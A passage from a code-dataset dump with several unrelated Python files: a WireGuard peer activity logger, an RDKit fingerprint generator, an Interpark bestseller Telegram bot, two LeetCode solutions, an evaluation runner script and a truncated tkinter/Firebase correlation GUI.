Based on this behavior we assume that if there is no\nnew handshake after a while (default Wirelogd timeout value is 5 minutes), the\nclient is probably inactive.\n\"\"\"\n\nimport argparse\nimport configparser\nimport json\nimport logging\nimport os\nimport pathlib\nimport subprocess # nosec\nimport sys\nimport time\nfrom functools import lru_cache\n\n\n@lru_cache(maxsize=6)\ndef booly(value: str) -> bool:\n \"\"\"Return a boolean from values like 'yes', 'no', etc.\"\"\"\n truthy_values = (\n '1',\n 'on',\n 'enable',\n 'enabled',\n 'true',\n 'yes',\n )\n\n return str(value).lower() in truthy_values\n\n\ndef config_from_defaults(struct: tuple) -> dict:\n \"\"\"Return dict from defaults.\"\"\"\n return {x: y for x, _, y in struct}\n\n\ndef config_from_file(struct: tuple, config_path: str) -> dict:\n \"\"\"Return dict from configparser.\"\"\"\n configfile = configparser.ConfigParser()\n if not pathlib.Path(config_path).exists():\n return {}\n configfile.read(config_path)\n\n return {\n x: y(configfile.get('wirelogd', x))\n for x, y, _ in struct\n if configfile.get('wirelogd', x, fallback=None)\n }\n\n\ndef config_from_environment(struct: tuple) -> dict:\n \"\"\"Return dict from environment.\"\"\"\n return {\n x: y(os.environ['WIRELOGD_' + x.upper().replace('-', '_')])\n for x, y, _ in struct\n if os.getenv('WIRELOGD_' + x.upper().replace('-', '_'))\n }\n\n\ndef config_from_args(struct: tuple, args: argparse.Namespace) -> dict:\n \"\"\"Return dict from args.\"\"\"\n return {\n x: y(getattr(args, x.replace('-', '_')))\n for x, y, _ in struct\n if (\n hasattr(args, x.replace('-', '_'))\n and getattr(args, x.replace('-', '_'))\n )\n }\n\n\ndef parse_config(struct: tuple, path: str, args: argparse.Namespace) -> dict:\n \"\"\"Return config from: args > environment > configfile > defaults.\"\"\"\n config: dict = {}\n\n # set defaults\n config_defaults = config_from_defaults(struct)\n config.update(config_defaults)\n\n # set from configuration file\n config_file = config_from_file(struct, path)\n config.update(config_file)\n\n # set from environment variables\n config_env = config_from_environment(struct)\n config.update(config_env)\n\n # set from command-line arguments\n config_args = config_from_args(struct, args)\n config.update(config_args)\n\n return config\n\n\n@lru_cache(maxsize=128)\ndef link_wggw(path: str, pubkey: str) -> str:\n \"\"\"Return name from wg-gen-web config matching with public key.\"\"\"\n files = pathlib.Path(path).glob('*-*-*-*-*')\n for conf_path in files:\n with open(conf_path) as conf_fp:\n conf = json.load(conf_fp)\n if conf['publicKey'] == pubkey:\n return conf['name']\n\n return 'unknown'\n\n\ndef peer_dict(peer: list, wggw: bool, wggw_path: str) -> dict:\n \"\"\"Return structured dict from wg peer dump line.\"\"\"\n fpeer = {\n 'interface': peer[0],\n 'public-key': peer[1],\n 'endpoint': peer[3],\n 'allowed-ips': peer[4],\n 'latest-handshake': float(peer[5]),\n 'name': 'unknown',\n }\n\n if wggw and wggw_path:\n fpeer['name'] = link_wggw(wggw_path, fpeer['public-key'])\n\n return fpeer\n\n\ndef get_peers(sudo: bool, wggw: bool, wggw_path: str) -> tuple:\n \"\"\"Return list of peers, each peer as dict of informations.\"\"\"\n # run command\n cmd = ['wg', 'show', 'all', 'dump']\n if sudo:\n cmd.insert(0, 'sudo')\n try:\n res = subprocess.run(cmd, capture_output=True, check=True) # nosec\n except subprocess.CalledProcessError:\n sys.exit('executing `%s` failed' % ' '.join(cmd))\n except FileNotFoundError:\n sys.exit('wireguard-tools are not installed')\n\n # filter and 
format peers (client peers have 9 columns)\n peers_list = [\n x.split()\n for x in res.stdout.decode().strip().split('\\n')\n if len(x.split()) == 9\n ]\n peers = tuple(peer_dict(x, wggw, wggw_path) for x in peers_list)\n\n return peers\n\n\ndef check_timeout(peer: dict, timeout: int) -> bool:\n \"\"\"Return True if timeout is reached.\"\"\"\n # elapsed time between now and latest peer handshake\n elapsed_time = time.time() - peer['latest-handshake']\n expired = elapsed_time > timeout\n\n return expired\n\n\ndef run_loop(config: dict, log: logging.Logger):\n \"\"\"Run loop executing actions and logging results.\"\"\"\n # initialize activity state tracking\n activity_state: dict = {}\n\n log.info('starting wirelodg')\n while True:\n peers = get_peers(\n config['sudo'],\n config['wg-gen-web'],\n config['wg-gen-web-path'],\n )\n log.debug('%s', peers)\n for peer in peers:\n key = f\"{peer['public-key']}-{peer['interface']}\"\n was_active = activity_state.get(key, False)\n timedout = check_timeout(peer, config['timeout'])\n if was_active and timedout:\n # log inactive connection\n activity_state[key] = False\n log.info(\n '%s - %s - %s - %s - %s - inactive',\n peer['name'],\n peer['public-key'],\n peer['endpoint'],\n peer['allowed-ips'],\n peer['interface'],\n )\n elif not was_active and not timedout:\n # log new active connection\n activity_state[key] = True\n log.info(\n '%s - %s - %s - %s - %s - active',\n peer['name'],\n peer['public-key'],\n peer['endpoint'],\n peer['allowed-ips'],\n peer['interface'],\n )\n log.handlers[0].flush()\n time.sleep(config['refresh'])\n\n\ndef setup_parser() -> argparse.ArgumentParser:\n \"\"\"Set the main arguments.\"\"\"\n parser = argparse.ArgumentParser(prog='wirelogd', description=__doc__)\n parser.add_argument(\n '--config', '-c',\n help='path to configuration file',\n metavar='str',\n )\n parser.add_argument(\n '--debug', '-d',\n help='enable debug logging',\n action='store_true',\n )\n parser.add_argument(\n '--refresh', '-r',\n help='refresh interval in seconds',\n type=int,\n metavar='int',\n )\n parser.add_argument(\n '--sudo', '-s',\n help='run subprocess commands with sudo',\n action='store_true',\n )\n parser.add_argument(\n '--timeout', '-t',\n help='wireguard handshake timeout in seconds',\n type=int,\n metavar='int',\n )\n parser.add_argument(\n '--wg-gen-web', '-w',\n help='link peer with its wg-gen-web config name',\n action='store_true',\n )\n parser.add_argument(\n '--wg-gen-web-path',\n help='path where wg-gen-web store its config files',\n metavar='str',\n )\n\n return parser\n\n\ndef setup_config(args: argparse.Namespace) -> dict:\n \"\"\"Set the main configuration.\"\"\"\n config_struct = (\n # settings, type to cast, default\n ('debug', booly, False),\n ('refresh', int, 5),\n ('sudo', booly, False),\n ('timeout', int, 300),\n ('wg-gen-web', booly, False),\n ('wg-gen-web-path', str, '/etc/wireguard/'),\n )\n\n config_path = (\n args.config\n or os.getenv('WIRELOGD_CONFIG')\n or '/etc/wirelogd.cfg'\n )\n\n config = parse_config(config_struct, config_path, args)\n\n return config\n\n\ndef setup_logger(config: dict) -> logging.Logger:\n \"\"\"Set the main logger.\"\"\"\n log_level = logging.DEBUG if config['debug'] else logging.INFO\n\n log_format = logging.Formatter('%(levelname)s - %(message)s')\n\n log_stream = logging.StreamHandler()\n log_stream.setFormatter(log_format)\n log_stream.setLevel(log_level)\n\n logger = logging.getLogger('wirelogd')\n logger.setLevel(log_level)\n logger.addHandler(log_stream)\n\n return logger\n\n\ndef 
main():\n \"\"\"Run main instructions.\"\"\"\n try:\n args = setup_parser().parse_args()\n config = setup_config(args)\n log = setup_logger(config)\n\n run_loop(config, log)\n except KeyboardInterrupt:\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"wirelogd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347332782","text":"from scipy import sparse\nimport numpy as np\nimport pandas as pd\nimport mmh3\n\nfrom joblib import Parallel, delayed\n\nfrom rdkit import Chem\nfrom rdkit.Chem.rdReducedGraphs import GetErGFingerprint\nfrom rdkit.Chem import rdFingerprintGenerator, MACCSkeys\nfrom rdkit.Chem.rdmolops import PatternFingerprint, LayeredFingerprint, RDKFingerprint\nfrom rdkit.Chem.Pharm2D import Gobbi_Pharm2D,Generate\n\ndef makeMols(num=None):\n smiles = pd.read_csv('./raw_data/allSmiles.csv', header=None)\n mols = list()\n for smile in smiles[0].iloc[0:num]:\n mols.append(Chem.MolFromSmiles(smile))\n return np.array(mols)\n\ndef get_reduced_graphs(mols):\n fps = list()\n for mol in mols:\n fps.append(GetErGFingerprint(mol))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('float')\n\ndef get_maccs(mols):\n fps = list()\n for mol in mols:\n fps.append(np.array(MACCSkeys.GenMACCSKeys(mol)))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_rdk_fps(mols):\n fps = list()\n for mol in mols:\n fps.append(np.array(RDKFingerprint(mol)))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_pattern_fps(mols):\n fps = list()\n for mol in mols:\n fps.append(np.array(PatternFingerprint(mol)))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_layered_fps(mols):\n fps = list()\n for mol in mols:\n fps.append(np.array(LayeredFingerprint(mol)))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_2dpharm(mols, fp_size=2000):\n factory = Gobbi_Pharm2D.factory\n fps = list()\n for mol in mols:\n try:\n sig = Generate.Gen2DFingerprint(mol,factory)\n indices = np.array([mmh3.hash(str(i)) for i in sig.GetOnBits()])%fp_size\n fp = np.zeros(fp_size, dtype=int)\n if len(indices)>0:\n fp[indices]=1\n fps.append(fp)\n except Exception:\n print('ERROR')\n print(Chem.MolToSmiles(mol))\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_atom_pair(mols):\n gen_ap = rdFingerprintGenerator.GetAtomPairGenerator()\n fps = list()\n for mol in mols:\n fp = np.array(gen_ap.GetFingerprint(mol))\n fps.append(fp)\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_topological_torsion(mols):\n gen_tt = rdFingerprintGenerator.GetTopologicalTorsionGenerator()\n fps = list()\n for mol in mols:\n fp = np.array(gen_tt.GetFingerprint(mol))\n fps.append(fp)\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_morgan(mols):\n gen_mo = rdFingerprintGenerator.GetMorganGenerator()\n fps = list()\n for mol in mols:\n fp = np.array(gen_mo.GetFingerprint(mol))\n fps.append(fp)\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\ndef get_morgan_features(mols):\n invGen =rdFingerprintGenerator.GetMorganFeatureAtomInvGen()\n gen_mo = rdFingerprintGenerator.GetMorganGenerator(atomInvariantsGenerator=invGen)\n fps = list()\n for mol in mols:\n fp = np.array(gen_mo.GetFingerprint(mol))\n fps.append(fp)\n fps = np.array(fps)\n return sparse.csr_matrix(fps).astype('int')\n\nif __name__ 
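# --- Hedged usage sketch (not in the original script): computing one Morgan
# fingerprint the same way get_morgan() above does, for a single molecule.
# The aspirin SMILES is just an example input; the generator's default width is 2048.
import numpy as np
from scipy import sparse
from rdkit import Chem
from rdkit.Chem import rdFingerprintGenerator

mol = Chem.MolFromSmiles('CC(=O)Oc1ccccc1C(=O)O')  # aspirin
gen_mo = rdFingerprintGenerator.GetMorganGenerator()
fp = np.array(gen_mo.GetFingerprint(mol))
row = sparse.csr_matrix(fp).astype('int')  # one sparse row, as get_morgan builds
print(row.shape, row.nnz)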
== '__main__':\n\n    mols = makeMols()\n\n    #These ones are pickleable:\n    funcs = [get_2dpharm, get_maccs, get_atom_pair, get_topological_torsion,\n             get_morgan, get_morgan_features]\n    names = ['2dpharm', 'maccs', 'atom_pair', 'topo_torsion',\n             'morgan', 'morgan_feat']\n    n_jobs = 8\n    for func, name in zip(funcs, names):\n        print(f'Making {name} fingerprints')\n        split_fps = Parallel(n_jobs=n_jobs)(delayed(func)(i) for i in np.array_split(mols, n_jobs))\n        fps = sparse.vstack([*split_fps])\n        sparse.save_npz('./processed_data/fingerprints/'+name+'.npz', fps)\n\n\n    #these ones are not pickleable:\n    funcs = [get_reduced_graphs, get_rdk_fps, get_pattern_fps,\n             get_layered_fps]\n    names = ['erg', 'rdk', 'pattern', 'layered']\n    for func, name in zip(funcs, names):\n        print(f'Making {name} fingerprints')\n        fps = func(mols)\n        sparse.save_npz('./processed_data/fingerprints/'+name+'.npz', fps)\n","sub_path":"code/make_fingerprints.py","file_name":"make_fingerprints.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"177500824","text":"# -*- coding: utf-8 -*-\r\n\r\nimport requests\r\nimport json\r\nimport random\r\n\r\nfrom urllib.request import urlopen\r\n# Interpark API key\r\nInterpark_API_KEY = \"key=[Interpark_API_KEY]\"\r\n# category number\r\ncategoryId = '100'\r\n#print(search_result)\r\n\r\n\r\n\r\n# Select a category.\r\n# Humanities - 119, Natural science - 116, Economics/business - 117, Self-improvement - 118, Hobby/leisure - 124\r\n#\r\n\r\n\r\n# Given a category name, show the bestseller list for that category.\r\n\r\ndef CategorySearch(category):\r\n    if category == '인문':\r\n        categoryId = '119'\r\n    elif category == '자연과학':\r\n        categoryId = '116'\r\n    elif category == '경제경영':\r\n        categoryId = '117'\r\n    elif category == '자기계발':\r\n        categoryId = '118'\r\n    elif category == '취미/레저':\r\n        categoryId = '124'\r\n    else:\r\n        print(\"카테고리명을 다시 입력해주세요.\")\r\n    \r\n    # Build a list and keep only the needed fields from the fetched data.\r\n    request = requests.get('http://book.interpark.com/api/bestSeller.api?'+Interpark_API_KEY+'&categoryId='+categoryId+'&output=json')\r\n    #best = request.encoding\r\n    #print(\"Best:\", request.encoding)\r\n    #best = request.content\r\n    \r\n    #best = request.text\r\n    #print(\"best:\",best, \"type:\",type(best))\r\n    #best.decode('utf-8','ignore')\r\n    \r\n    #best = request.text\r\n    #print(\"type:\",type(best))\r\n    #best.encode(\"utf-8\")\r\n    #print(\"best:\",best)\r\n    best = request.content.decode('utf-8')\r\n    search_result = json.loads(best)\r\n\r\n    api_lists = []\r\n    # Extract required fields\r\n    for i in range(len(search_result['item'])):\r\n        title = search_result['item'][i]['title']\r\n        author = search_result['item'][i]['author']\r\n        publisher = search_result['item'][i]['publisher']\r\n        link = search_result['item'][i]['link']\r\n        api_lists.append('제목: ' + title +' 저자: '+ author +' 출판사: '+ publisher + link)\r\n    print(\"api_lists:\",api_lists)\r\n\r\n    # Map the category code back to a display name.\r\n    if categoryId == '119':\r\n        category = '인문'\r\n    elif categoryId == '116':\r\n        category = '자연과학'\r\n    elif categoryId == '117':\r\n        category = '경제경영'\r\n    elif categoryId == '118':\r\n        category = '자기계발'\r\n    elif categoryId == '124':\r\n        category = '취미/레저'\r\n    print('{NAME} 관련 베스트 셀러 목록입니다.'.format(NAME=category))\r\n    # Iterate over the full list, but\r\n    for index, api_list in enumerate(api_lists):\r\n        api_list = api_lists[index]\r\n        text = api_list\r\n        no = str(index+1)+\". 
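# --- Added sketch of the split/compute/stack pattern used in the __main__ block
# above: chunk the input, map a picklable function over chunks in parallel, then
# vstack the sparse results. fake_fingerprint stands in for get_morgan and friends.
import numpy as np
from scipy import sparse
from joblib import Parallel, delayed

def fake_fingerprint(chunk):
    # stand-in: one all-zeros 8-column row per input element
    return sparse.csr_matrix(np.zeros((len(chunk), 8), dtype=int))

data = np.arange(20)
parts = Parallel(n_jobs=4)(delayed(fake_fingerprint)(c) for c in np.array_split(data, 4))
fps = sparse.vstack(parts)
assert fps.shape == (20, 8)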
\"\r\n        print(\"no:\",no)\r\n        \r\n        # stop after the first 10 entries.\r\n        if index==9:\r\n            break\r\n\r\ndef search(chat_id, code):\r\n    # Fetch books for the given category.\r\n    interpark_API_KEY = \"key=[Interpark_API_KEY]\"\r\n    request = requests.get('http://book.interpark.com/api/bestSeller.api?'+interpark_API_KEY+'&categoryId='+code+'&output=json')\r\n    genre = request.content.decode('utf-8')\r\n    search_result = json.loads(genre)\r\n    book_list = []\r\n    # Extract required fields\r\n    for i in range(len(search_result['item'])):\r\n        title = search_result['item'][i]['title']\r\n        author = search_result['item'][i]['author']\r\n        publisher = search_result['item'][i]['publisher']\r\n        #description = search_result['item'][i]['description']\r\n        link = search_result['item'][i]['link']\r\n        \r\n        book_list.append('<제목: ' + title +' \\r\\n저자: '+ author +' 출판사: '+ publisher + ' 링크: '+ link)\r\n        \r\n    # Shuffle the book_list data fetched from the API.\r\n    random.shuffle(book_list)\r\n    \r\n    # Print only five entries\r\n    for index, book_info in enumerate(book_list):\r\n        book_info = str(book_list[index])\r\n        print(\"book_info:\",index+1, book_info)\r\n        params = {'chat_id':chat_id, 'text': book_info, 'parse_mode':'HTML'}\r\n        response = requests.post(url, json=params)  # NOTE: 'url' (the bot API endpoint) is not defined in this file\r\n        print(\"response\",response)\r\n        # stop after five entries.\r\n        if index==4:\r\n            break\r\n    \r\n    \r\n# Pass the category number as a string\r\n# Humanities\r\n#CategorySearch('인문')\r\n\r\nsearch('954489427','119')\r\n","sub_path":"Chaek_Bot/InterparkAPI.py","file_name":"InterparkAPI.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535200646","text":"\"\"\"\nConvert an array sorted in ascending order into a height-balanced binary search tree.\nHere, a height-balanced binary tree means a binary tree in which the depths of the two subtrees of every node differ by at most 1.\n\nExample:\nGiven the sorted array: [-10,-3,0,5,9],\n\nOne possible answer is: [0,-3,9,-10,null,5], which represents the following height-balanced BST:\n\n      0\n     / \\\n   -3   9\n   /   /\n -10  5\n\n\n\"\"\"\n\n\"\"\"\nApproach:\nDFS with recursion, using the binary-split (midpoint) idea.\n\"\"\"\n# my solution\n\nclass Solution:\n    def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n        maxlength=len(nums)\n        def DFS(left,right):\n            if left>right:\n                return\n            mid=(left+right)//2\n            root=TreeNode(nums[mid])\n            root.left=DFS(left,mid-1)\n            root.right=DFS(mid+1, right)\n            return root\n        return DFS(0, maxlength-1)\n\n\n\n\n\n","sub_path":"108、将有序数组转换为二叉搜索树.py","file_name":"108、将有序数组转换为二叉搜索树.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"291747005","text":"import os\nimport sys\nimport glob\nimport tempfile\nimport subprocess\nimport pickle\nimport json\n\n\nROOT = '/data/vision/torralba/distillation/S2V/'\n# IMAGE_ROOT = \"/data/vision/torralba/scratch2/stevenliu/GAN_stability/fid_samples\"\n\n\n\ndef get_cmd(desc, BS=400, TASK='MR+CR+SUBJ+MPQA', GLOVE_PATH=\"dictionaries/GloVe\", ST_DATA='./ST_data', RESULTS_HOME='results/BC'):\n    return [\n        sys.executable, '-u', 'src/evaluate.py',\n        f'--eval_task={TASK}',\n        f'--data_dir={ST_DATA}',\n        f'--model_config=model_configs/BS400-W620-S1200-case-bidir-norm/{desc}/eval.json',\n        f'--results_path=results/BC',\n        f'--eval_dir=results/BC/BS400-W620-S1200-case-bidir-norm/{desc}/eval',\n        f'--Glove_path={GLOVE_PATH}',\n    ]\n\n    # python src/evaluate.py \\\n    #   --eval_task=MR+CR \\\n    #   --data_dir=./ST_data \\\n    #   --model_config='model_configs/BS400-W620-S1200-case-bidir/eval.json' \\\n    #   --results_path='results/BC' \\\n    #   --eval_dir='results/BC/BS400-W620-S1200-case-bidir/eval' \\\n    #   --Glove_path='dictionaries/GloVe'\n\ndef run_cmd(cmd):\n    with subprocess.Popen(cmd,\n            stdout=subprocess.PIPE, cwd=ROOT,\n            bufsize=1, universal_newlines=True,\n            encoding='utf-8') as p:\n        for 
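# --- Self-contained sketch (TreeNode is defined here because LeetCode normally
# supplies it) showing that the midpoint recursion above yields a BST whose
# inorder traversal reproduces the sorted input.
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def sorted_to_bst(nums, lo=0, hi=None):
    if hi is None:
        hi = len(nums) - 1
    if lo > hi:
        return None
    mid = (lo + hi) // 2                     # middle element becomes the root
    node = TreeNode(nums[mid])
    node.left = sorted_to_bst(nums, lo, mid - 1)
    node.right = sorted_to_bst(nums, mid + 1, hi)
    return node

def inorder(node):
    return inorder(node.left) + [node.val] + inorder(node.right) if node else []

assert inorder(sorted_to_bst([-10, -3, 0, 5, 9])) == [-10, -3, 0, 5, 9]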
line in p.stdout:\n print(line, end='', flush=True)\n\n if p.returncode != 0:\n raise subprocess.CalledProcessError(p.returncode, p.args)\n\n\nif __name__ == '__main__':\n desc = sys.argv[1]\n TASK = os.environ.get('TASK', 'MR+CR')\n cmd = get_cmd(desc, TASK=TASK)\n print()\n print()\n print(' \\\\\\n\\t'.join(cmd))\n print()\n print()\n run_cmd(cmd)\n\n\n","sub_path":"scripts/run_eval.py","file_name":"run_eval.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"208499364","text":"#\n# @lc app=leetcode id=19 lang=python3\n#\n# [19] Remove Nth Node From End of List\n#\n# https://leetcode.com/problems/remove-nth-node-from-end-of-list/description/\n#\n# algorithms\n# Medium (35.74%)\n# Likes: 4869\n# Dislikes: 290\n# Total Accepted: 807.4K\n# Total Submissions: 2.3M\n# Testcase Example: '[1,2,3,4,5]\\n2'\n#\n# Given the head of a linked list, remove the n^th node from the end of the\n# list and return its head.\n# \n# Follow up: Could you do this in one pass?\n# \n# \n# Example 1:\n# \n# \n# Input: head = [1,2,3,4,5], n = 2\n# Output: [1,2,3,5]\n# \n# \n# Example 2:\n# \n# \n# Input: head = [1], n = 1\n# Output: []\n# \n# \n# Example 3:\n# \n# \n# Input: head = [1,2], n = 1\n# Output: [1]\n# \n# \n# \n# Constraints:\n# \n# \n# The number of nodes in the list is sz.\n# 1 <= sz <= 30\n# 0 <= Node.val <= 100\n# 1 <= n <= sz\n# \n# \n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n slow = head\n fast = head\n while n > 0:\n fast = fast.next\n n -= 1\n if fast is None:\n return head.next\n while fast is not None and fast.next is not None:\n fast = fast.next\n slow = slow.next\n\n slow.next = slow.next.next\n return head\n# @lc code=end\n\n","sub_path":"19.remove-nth-node-from-end-of-list.py","file_name":"19.remove-nth-node-from-end-of-list.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"642175947","text":"import datetime\nimport random\nfrom tkinter.ttk import Combobox\n\nfrom firebase import firebase\nimport matplotlib.pyplot as p\nimport numpy as np\nfrom tkinter import *\n\nvariables = []\nvalues = []\ndictionary = []\ncorr_mat = np.zeros((12, 12), int)\ncorr_p, p_oil, p_ev, p_con, s_con, s_ev, temph_i, temph_s, tempc_i, tempc_s, temp_d, temp_a = [], [], [], [], [], [], \\\n [], [], [], [], [], []\nfirebase = firebase.FirebaseApplication('https://proyecto-b2674.firebaseio.com/')\n\n\ndef pushed():\n date = datetime.datetime.now()\n\n data_dict = {\"Temperatura del Déposito de Aceite\": \"1\",\n \"Presión de Aceite\": \"2\",\n \"Presión en Condesador\": \"3\",\n \"Saturación en Condesador\": \"4\",\n \"Presión del Evaporador\": \"5\",\n \"Saturación en Evaporador\": \"6\"}\n firebase.post('/RPi', data_dict)\n #firebase.put('RPi', \"NombreX\", data_dict)\n\n lbl_1.configure(text=\"you clicked\")\n\n\ndef get_data(corrp, poil, pev, pcon, scon, sev, temphi, temphs, tempci, tempcs, tempd, tempa):\n # Here we clear the array\n variables.clear()\n data_dict = firebase.get(\"/data\", None)\n\n if combo1.get() == \"Ultimas 24 horas\":\n length = 10 # value of the radio button for time lapse\n elif combo1.get() == 'Ultimas 72 horas':\n length = 50\n else:\n length = 100\n\n count = 0 # This counter indicates how much 
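# --- Usage sketch for the two-pointer solution above (ListNode defined here;
# LeetCode normally supplies it): the fast pointer gets an n-node head start,
# so when it reaches the tail, slow sits just before the node to remove.
class ListNode:
    def __init__(self, val=0, next=None):
        self.val, self.next = val, next

def build(vals):
    head = None
    for v in reversed(vals):
        head = ListNode(v, head)
    return head

def to_list(head):
    out = []
    while head:
        out.append(head.val)
        head = head.next
    return out

assert to_list(Solution().removeNthFromEnd(build([1, 2, 3, 4, 5]), 2)) == [1, 2, 3, 5]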
variables we are gonna get\n for i, j in data_dict.items():\n count += 1\n if count > length:\n break\n for x, y in j.items():\n if x == \"% de Corriente a Plena Carga\":\n corrp.append(y)\n elif x == \"Presión de Aceite\":\n poil.append(y)\n elif x == \"Presión del Evaporador\":\n pev.append(y)\n elif x == \"Presión en Condesador\":\n pcon.append(y)\n elif x == \"Saturación en Condesador\":\n scon.append(y)\n elif x == \"Saturación en Evaporador\":\n sev.append(y)\n elif x == \"Temperatura de Agua Helada\":\n for z, w in y.items():\n if z == \"Introduciendo\":\n temphi.append(w)\n else:\n temphs.append(w)\n elif x == \"Temperatura de Agua de Condensación\":\n for z, w in y.items():\n if z == \"Introduciendo\":\n tempci.append(w)\n else:\n tempcs.append(w)\n elif x == \"Temperatura de Descarga\":\n tempd.append(y)\n else:\n tempa.append(y)\n print(\"Contador: \", count)\n corrp = np.array(corrp)\n poil = np.array(poil)\n pev = np.array(pev)\n pcon = np.array(pcon)\n scon = np.array(scon)\n sev = np.array(sev)\n temphi = np.array(temphi)\n temphs = np.array(temphs)\n tempci = np.array(tempci)\n tempcs = np.array(tempcs)\n tempd = np.array(tempd)\n tempa = np.array(tempa)\n\n # Here we return all variables as a dictionary\n variables.extend((corrp, poil, pev, pcon, scon, sev, temphi, temphs, tempci, tempcs, tempd, tempa))\n\n\ndef plot(x, y, x_label, y_label):\n p.figure(x_label + \" vs \" + y_label)\n corr = np.corrcoef(x, y)\n corr = corr[0][1]\n p.title(\"Correlation coefficient: {}\".format(corr))\n p.plot(x, y, \".r\")\n p.xlabel(x_label)\n p.ylabel(y_label)\n p.show()\n\n\n# Lets_plot allows to get the list of data and the respective label for the radio buttons selected\ndef lets_plot(name1, name2):\n\n \"\"\"X\"\"\"\n if name1 == 'Temperatura de Descarga':\n x = variables[10]\n elif name1 == '% de Corriente a Plena Carga':\n x = variables[0]\n elif name1 == 'Temp Introduciendo Agua de condensación':\n x = variables[8]\n elif name1 == 'Temp Salida agua de condensación':\n x = variables[9]\n elif name1 == 'Temperatura del Depósito de Aceite':\n x = variables[11]\n elif name1 == 'Presión de Aceite':\n x = variables[1]\n elif name1 == 'Temp Introduciendo Agua Helada':\n x = variables[6]\n elif name1 == 'Temp Salida Agua Helada':\n x = variables[7]\n elif name1 == 'Presión de condensador':\n x = variables[3]\n elif name1 == 'Saturacion en condensador':\n x = variables[4]\n elif name1 == 'Presion del Evaporador':\n x = variables[2]\n if name1 == 'Saturacion en Evaporador':\n x = variables[5]\n\n \"\"\"Y\"\"\"\n if name2 == 'Temperatura de Descarga':\n y = variables[10]\n elif name2 == '% de Corriente a Plena Carga':\n y = variables[0]\n elif name2 == 'Temp Introduciendo Agua de condensación':\n y = variables[8]\n elif name2 == 'Temp Salida agua de condensación':\n y = variables[9]\n elif name2 == 'Temperatura del Depósito de Aceite':\n y = variables[11]\n elif name2 == 'Presión de Aceite':\n y = variables[1]\n elif name2 == 'Temp Introduciendo Agua Helada':\n y = variables[6]\n elif name2 == 'Temp Salida Agua Helada':\n y = variables[7]\n elif name2 == 'Presión de condensador':\n y = variables[3]\n elif name2 == 'Saturacion en condensador':\n y = variables[4]\n elif name2 == 'Presion del Evaporador':\n y = variables[2]\n if name2 == 'Saturacion en Evaporador':\n y = variables[5]\n\n plot(x, y, name1, name2)\n\ndef update(list):\n combo3['values'] = list\n\n\ndef check_for_correlation():\n amount = 0\n corr_mat.fill(0)\n\n print(\"cantidad variables: \", len(variables))\n for i in range(0, 
len(variables)): # len(variables) to get all data\n for j in range(i, len(variables)):\n if i != j:\n amount += 1\n corr = np.corrcoef(variables[i], variables[j])\n corr = corr[0][1]\n if abs(corr) >= 0.1:\n print(\"Relevant correlation\")\n corr_mat[i][j] = 1\n\n print(\"Coeficiente de correlación: {}\".format(corr))\n print(amount)\n\n for i in range(12):\n for j in range(i, 12):\n corr_mat[j][i] = corr_mat[i][j]\n\n print(corr_mat)\n\n\n \"\"\"# Insert values into textbox\n txt_1.configure(state='normal')\n txt_1.insert(\"end\", str(corr[0][1]))\n txt_1.configure(state='disabled')\"\"\"\n\ndef on_select():\n\n # this vector saves the values that are correlated to the one selected in the combobox2\n vec = []\n # This vector saves the variables names\n vec2 = []\n\n val = 0\n for i in range(12):\n if dictionary[i] == combo2.get():\n val = i\n break\n for i in range(0, len(corr_mat)):\n if corr_mat[val][i] == 1:\n vec.append(i)\n for i in range(0, len(vec)):\n vec2.append(dictionary[vec[i]])\n combo3.configure(state='readonly')\n combo3.configure(postcommand=update(vec2))\n\n\nif __name__ == \"__main__\":\n\n '''Main Window'''\n window = Tk()\n # Window title\n window.title(\"DSRED (Display System for Raspberry pi Extracted Data)\")\n # Window size\n window.geometry('600x200')\n\n \"\"\"-------------------------------------------------------GUI----------------------------------------------------\"\"\"\n '''Labels'''\n lbl_1 = Label(window, text=\"Push Data\")\n lbl_2 = Label(window, text=\"Get Data\")\n lbl_3 = Label(window, text=\"Graph variables\")\n lbl_4 = Label(window, text=\"Check for correlation\")\n lbl_5 = Label(window, text=\"Correlation coefficient\")\n lbl_6 = Label(window, text=\"X axis\")\n lbl_7 = Label(window, text=\"Y axis\")\n\n '''Buttons actions'''\n # Push data\n btn_1 = Button(window, text=\"Push data\", bg=\"gray\", fg=\"black\", command=pushed)\n # Get data\n btn_2 = Button(window, text=\"Get data\", bg=\"gray\", fg=\"black\", command=lambda: get_data(corr_p, p_oil, p_ev, p_con,\n s_con, s_ev, temph_i,\n temph_s, tempc_i, tempc_s,\n temp_d, temp_a))\n # Graph variables\n btn_3 = Button(window, text=\"Graph\", bg=\"gray\", fg=\"black\", command=lambda: lets_plot(combo2.get(), combo3.get()))\n # Check correlation\n btn_4 = Button(window, 